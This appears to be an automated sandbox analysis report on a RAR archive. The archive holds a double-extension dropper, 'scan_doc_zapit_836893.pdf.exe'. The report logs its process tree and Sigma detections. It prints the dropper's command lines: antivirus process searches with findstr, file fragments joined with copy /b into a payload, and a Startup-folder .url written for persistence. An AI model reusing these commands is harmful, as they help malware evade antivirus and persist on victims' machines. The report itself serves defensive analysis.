Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar

Overview

General Information

Sample name:#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
renamed because original name is a hash value
Original sample name: .rar
Analysis ID:1546128
MD5:f46e12150b7b0e381c3cf871325eed8e
SHA1:57d88bcbf4f6804cdaea6b9c06e0a2a204ec4a6a
SHA256:35d6eab4f66ce38c0a8953b5fcb3b03bf9f042ca4a4ef8f0555ebabe39ac18f8
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious Double Extension File Execution
Drops PE files with a suspicious file extension
Sigma detected: Suspicious Double Extension Files
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64_ra
  • OpenWith.exe (PID: 5868 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • 7zFM.exe (PID: 6544 cmdline: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar" MD5: 30AC0B832D75598FB3EC37B6F2A8C86A)
      • notepad.exe (PID: 6832 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt MD5: 27F71B12CB585541885A31BE22F61C83)
      • scan_doc_zapit_836893.pdf.exe (PID: 6728 cmdline: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" MD5: CBCB0FF5AA471E22A6B129196A556D97)
        • cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7060 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7052 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 6628 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5484 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 1764 cmdline: cmd /c md 185027 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 2844 cmdline: findstr /V "venezuelalandscapesmeantposters" Tournaments MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 2212 cmdline: cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Spy.pif (PID: 3284 cmdline: Spy.pif H MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 4132 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 2412 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • scan_doc_zapit_836893.pdf.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe" MD5: CBCB0FF5AA471E22A6B129196A556D97)
    • cmd.exe (PID: 4896 cmdline: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 636 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1436 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1272 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6044 cmdline: cmd /c md 185027 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 4808 cmdline: cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spy.pif (PID: 1240 cmdline: Spy.pif H MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • choice.exe (PID: 3192 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Double Extension File Execution
Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, ParentCommandLine: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar", ParentImage: C:\Program Files\7-Zip\7zFM.exe, ParentProcessId: 6544, ParentProcessName: 7zFM.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , ProcessId: 6728, ProcessName: scan_doc_zapit_836893.pdf.exe
Sigma detected: Suspicious Double Extension Files
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Program Files\7-Zip\7zFM.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Spy.pif H, CommandLine: Spy.pif H, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: Spy.pif H, ProcessId: 3284, ProcessName: Spy.pif
Sigma detected: SCR File Write Event
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe, ParentProcessId: 6728, ParentProcessName: scan_doc_zapit_836893.pdf.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ProcessId: 5712, ProcessName: cmd.exe
Sigma detected: Suspicious Screensaver Binary File Creation
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\185027\Spy.pif, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4132, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5484, ProcessName: findstr.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeFile opened: C:\Users\user\AppData\Local
Source: unknownDNS traffic detected: query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Source: C:\Program Files\7-Zip\7zFM.exeWindow created: window name: CLIPBRDWNDCLASS
Source: classification engineClassification label: mal72.expl.evad.winRAR@51/17@2/0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifFile created: C:\Users\user\AppData\Local\NanoSec Cryptographics
Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_03
Source: C:\Program Files\7-Zip\7zFM.exeFile created: C:\Users\user\AppData\Local\Temp\7zO099FD947
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar"
Source: C:\Program Files\7-Zip\7zFM.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar"
Source: C:\Program Files\7-Zip\7zFM.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt
Source: C:\Program Files\7-Zip\7zFM.exeProcess created: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\7-Zip\7zFM.exeProcess created: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe "C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: unknownProcess created: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ninput.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: explorerframe.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dataexchange.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.fileexplorer.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: structuredquery.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: atlthunk.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.search.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: winmm.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ehstorshell.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: networkexplorer.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: cscui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: mpr.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sfc_os.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textshaping.dll
Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windows.storage.dll
